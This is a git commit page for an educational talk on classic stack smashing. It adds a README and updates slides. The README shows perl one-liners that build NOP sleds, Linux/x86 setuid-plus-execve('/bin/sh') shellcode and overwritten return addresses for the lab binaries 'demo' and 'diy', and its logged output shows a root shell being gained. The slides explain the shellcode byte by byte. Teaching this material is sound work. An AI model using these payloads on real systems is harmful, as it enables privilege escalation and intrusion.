ward/smash-talk
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

minor improvements

Browse source
This commit is contained in:
Ward Wouts 2023-03-08 10:32:57 +01:00
parent cce16c40ff
commit 03cd6ada44
2 changed files with 64 additions and 16 deletions
Download patch file Download diff file Expand all files Collapse all files

42
README.md Normal file
View file

@ -0,0 +1,42 @@
## Demo
Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.
```
atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit
```
```
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`
```
## DIY
```
export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
gdb ./diy
atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo diy foo.txt setup.sh shellcode.txt shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
```
Test without the dodgy push EBX
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`

38
index.html
View file

@ -124,22 +124,30 @@ name: inverse
layout: true layout: true
class: center, middle, inverse class: center, middle, inverse
--- ---
# Old skool stack smashing # ♫ Stack smashing like it's 1999 ♫
Ward Wouts<br> Ward Wouts<br>
https://wizeazz.nl/smash/ https://wizeazz.nl/smash/
--- ---
# Agenda # Agenda
1. Introduction [//]: # (This is a markdown comment.)
1. What is a stack? [//]: # (A proper markdown comment needs the empty line above it.)
1. How does this work? [//]: # (Two spaces at the end of a line are a linebreak in markdown.)
1. Vulnerable fuctions
1. Now what can we do with this? Introduction
1. Shellcode? What is a stack?
1. Endianness? How does this work?
1. Demo Vulnerable fuctions
1. DIY Now what can we do with this?
1. Quick Radare2 reference Shellcode?
Endianness?
Exploitation workflow
Demo
Protections
DIY
Quick Radare2 reference
Quick GDB reference
Shellcode explained
--- ---
# Introduction # Introduction
--- ---
@ -513,10 +521,8 @@ template: inverse
.right-column[ .right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
``` ```
/* /* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) * - 37 bytes - xgc@gotfault.net */
* - 37 bytes - xgc@gotfault.net
*/
"\x6a\x17" // push $0x17 "\x6a\x17" // push $0x17
"\x58" // pop %eax "\x58" // pop %eax
@ -590,7 +596,7 @@ mov %esp, %ebx Point EBX at command string
push %edx Push NULL to stack (no more arguments) push %edx Push NULL to stack (no more arguments)
push %ebx Push pointer to command str push %ebx Push pointer to command str
mov %esp, %ecx Point ECX at arg list mov %esp, %ecx Point ECX at arg list
int $0x80A Execute command in EAX int $0x80 Execute command in EAX
``` ```
Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to fill that 32-bit word. The EDX that is set to 0 and pushed makes up for the null string terminator. Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to fill that 32-bit word. The EDX that is set to 0 and pushed makes up for the null string terminator.